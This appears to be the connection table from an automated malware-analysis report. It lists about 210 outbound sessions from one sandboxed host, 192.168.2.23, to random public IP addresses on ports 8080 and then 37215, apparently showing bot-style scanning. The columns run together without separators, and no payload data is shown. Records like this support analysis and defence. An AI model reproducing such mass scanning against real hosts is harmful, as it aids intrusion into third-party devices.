                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12786192.168.2.233910044.98.238.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12787192.168.2.2337788129.120.153.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12788192.168.2.235835275.213.167.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12789192.168.2.2351366115.37.59.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12790192.168.2.2341122211.45.77.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12791192.168.2.233606878.225.245.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12792192.168.2.234682467.57.156.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12793192.168.2.2342728181.139.70.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12794192.168.2.2360738103.148.159.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12795192.168.2.234091095.44.37.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12796192.168.2.234116648.189.41.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12797192.168.2.234153882.171.221.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12798192.168.2.235946848.207.150.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12799192.168.2.2346636131.60.161.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12800192.168.2.233591860.178.165.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12801192.168.2.233978047.66.67.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12802192.168.2.2360420194.140.206.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12803192.168.2.2336548104.9.53.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12804192.168.2.233298463.80.127.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12805192.168.2.234384235.174.131.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12806192.168.2.2337910119.155.241.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12807192.168.2.234183282.230.6.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12808192.168.2.2335776149.153.35.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12809192.168.2.2359006132.172.218.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12810192.168.2.2351240174.42.27.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12811192.168.2.2355398116.207.13.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12812192.168.2.235041817.196.107.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12813192.168.2.2343710166.146.215.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12814192.168.2.2342474221.248.230.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12815192.168.2.2347288200.84.171.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12816192.168.2.235368263.235.220.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12817192.168.2.234209081.187.200.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12818192.168.2.2344318136.199.189.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12819192.168.2.2340600129.224.197.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12820192.168.2.2336650191.120.184.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12821192.168.2.2349408119.27.157.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12822192.168.2.234629825.164.55.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12823192.168.2.2337992221.213.47.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12824192.168.2.2354154160.72.149.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12825192.168.2.234526817.65.124.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12826192.168.2.2337654172.92.181.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12827192.168.2.2356196107.227.25.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12828192.168.2.2348630222.33.255.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12829192.168.2.2348504191.110.58.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12830192.168.2.2336940101.120.62.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12831192.168.2.2353748195.72.123.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12832192.168.2.236099227.143.214.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12833192.168.2.235036248.225.193.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12834192.168.2.2339544125.188.241.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12835192.168.2.2340308112.168.191.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12836192.168.2.234241840.42.56.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12837192.168.2.2347882122.17.10.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12838192.168.2.2345064119.195.16.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12839192.168.2.2340776201.208.83.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12840192.168.2.2337560161.130.56.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12841192.168.2.234642637.67.248.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12842192.168.2.2344244152.231.162.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12843192.168.2.2355814221.82.129.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12844192.168.2.2348562197.252.169.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12845192.168.2.235674648.170.109.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12846192.168.2.233563490.151.160.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12847192.168.2.2343710115.52.46.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12848192.168.2.2352004221.241.253.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12849192.168.2.2337330153.19.36.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12850192.168.2.2339570158.203.184.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12851192.168.2.234954082.131.200.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12852192.168.2.2341928198.88.210.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12853192.168.2.2357494171.29.3.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12854192.168.2.2349004182.129.119.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12855192.168.2.234056653.242.15.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12856192.168.2.2345278171.200.102.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12857192.168.2.2346712198.151.20.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12858192.168.2.235876672.131.137.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12859192.168.2.234810078.92.177.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12860192.168.2.2349832222.166.13.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12861192.168.2.236063641.205.144.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12862192.168.2.2340382143.158.35.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12863192.168.2.2354332103.227.229.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12864192.168.2.234571635.243.186.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12865192.168.2.2348474111.156.122.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12866192.168.2.2358684148.144.106.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12867192.168.2.2351112161.79.65.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12868192.168.2.23542101.12.130.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12869192.168.2.234732674.29.15.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12870192.168.2.2335362166.243.239.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12871192.168.2.2350128130.229.33.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12872192.168.2.2334230185.86.233.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12873192.168.2.2344680185.113.12.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12874192.168.2.233413053.89.62.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12875192.168.2.233513254.166.7.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12876192.168.2.233912638.32.224.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12877192.168.2.2352388185.94.224.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12878192.168.2.234508896.108.13.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12879192.168.2.2338782203.225.24.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12880192.168.2.235018092.213.42.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12881192.168.2.2358264210.84.110.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12882192.168.2.234153443.235.169.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12883192.168.2.233527892.163.143.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12884192.168.2.2356654150.122.74.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12885192.168.2.234306053.195.64.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12886192.168.2.2346960111.234.51.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12887192.168.2.2353952166.1.129.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12888192.168.2.2335342141.91.200.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12889192.168.2.234957845.116.177.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12890192.168.2.2339742149.69.146.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12891192.168.2.2359814134.220.50.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12892192.168.2.233671064.225.37.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12893192.168.2.233807013.176.196.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12894192.168.2.233518866.191.52.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12895192.168.2.234190851.222.39.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12896192.168.2.2351008134.208.49.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12897192.168.2.233338292.210.177.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12898192.168.2.234688246.121.72.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12899192.168.2.2357532115.168.88.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12900192.168.2.2345370103.45.229.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12901192.168.2.2359820163.174.56.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12902192.168.2.2343138106.58.148.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12903192.168.2.2358474112.72.220.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12904192.168.2.234789652.35.98.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12905192.168.2.2346566112.60.200.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12906192.168.2.2339266163.153.63.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12907192.168.2.2349212158.12.38.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12908192.168.2.2358534185.224.122.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12909192.168.2.2342546107.243.65.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12910192.168.2.234352052.132.72.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12911192.168.2.2348504218.86.235.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12912192.168.2.2349546141.14.181.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12913192.168.2.2355996198.31.65.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12914192.168.2.235143627.192.160.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12915192.168.2.2341186181.156.146.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12916192.168.2.234263899.203.79.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12917192.168.2.2336164198.215.206.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12918192.168.2.235573432.188.208.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12919192.168.2.2339286171.223.58.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12920192.168.2.2333204110.16.224.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12921192.168.2.2338240210.57.243.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12922192.168.2.235775436.108.121.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12923192.168.2.2347198220.51.12.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12924192.168.2.235679441.116.166.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12925192.168.2.2352958157.109.77.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12926192.168.2.233754241.182.92.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12927192.168.2.2350084157.127.127.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12928192.168.2.2333940157.211.213.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12929192.168.2.233427241.188.184.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12930192.168.2.2342244157.114.61.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12931192.168.2.234712441.161.90.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12932192.168.2.2339146157.205.243.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12933192.168.2.234461241.34.168.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12934192.168.2.2360652197.225.92.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12935192.168.2.2339242197.138.177.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12936192.168.2.2335742197.194.253.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12937192.168.2.234751441.29.206.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12938192.168.2.2343260157.38.229.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12939192.168.2.23475844.25.239.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12940192.168.2.234149441.84.67.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12941192.168.2.234320052.198.42.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12942192.168.2.2339068157.28.252.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12943192.168.2.2346674157.8.94.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12944192.168.2.2350082157.97.36.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12945192.168.2.2359078104.214.38.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12946192.168.2.2340742197.23.2.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12947192.168.2.2341960157.115.83.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12948192.168.2.2357490193.221.99.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12949192.168.2.2352490157.21.192.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12950192.168.2.2340788168.207.218.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12951192.168.2.2342782157.240.175.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12952192.168.2.233713244.90.80.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12953192.168.2.2340786157.209.72.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12954192.168.2.2335776197.212.77.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12955192.168.2.2336426197.114.176.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12956192.168.2.2356382197.96.23.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12957192.168.2.2348994157.128.180.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12958192.168.2.2353056178.185.227.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12959192.168.2.2345340105.116.51.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12960192.168.2.2333866157.228.254.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12961192.168.2.234044020.105.128.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12962192.168.2.2352912157.213.81.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12963192.168.2.2339342157.58.14.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12964192.168.2.2340710157.245.96.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12965192.168.2.2357770157.180.44.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12966192.168.2.2348792157.153.157.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12967192.168.2.2344502197.223.199.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12968192.168.2.2333558157.37.221.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12969192.168.2.233504218.235.205.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12970192.168.2.234814041.75.79.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12971192.168.2.233658841.186.149.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12972192.168.2.2360304197.79.246.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12973192.168.2.233740659.255.142.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12974192.168.2.234908841.161.182.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12975192.168.2.2358480197.182.149.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12976192.168.2.2335540157.112.13.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12977192.168.2.233541641.143.187.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12978192.168.2.2337894197.21.198.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12979192.168.2.2338144197.180.34.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12980192.168.2.2348070197.139.6.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12981192.168.2.2349820197.104.83.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12982192.168.2.2337602197.114.156.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12983192.168.2.2356744157.158.188.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12984192.168.2.234462241.94.97.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12985192.168.2.236084041.4.245.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12986192.168.2.234305454.222.1.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12987192.168.2.2342292157.31.151.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12988192.168.2.234016441.35.115.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12989192.168.2.233843441.108.5.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12990192.168.2.235886641.143.23.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12991192.168.2.233293087.199.104.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12992192.168.2.2360320157.42.176.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12993192.168.2.2344976197.135.26.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12994192.168.2.233567878.61.125.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12995192.168.2.2354816174.250.170.13837215
                                                        TimestampBytes transferredDirectionData


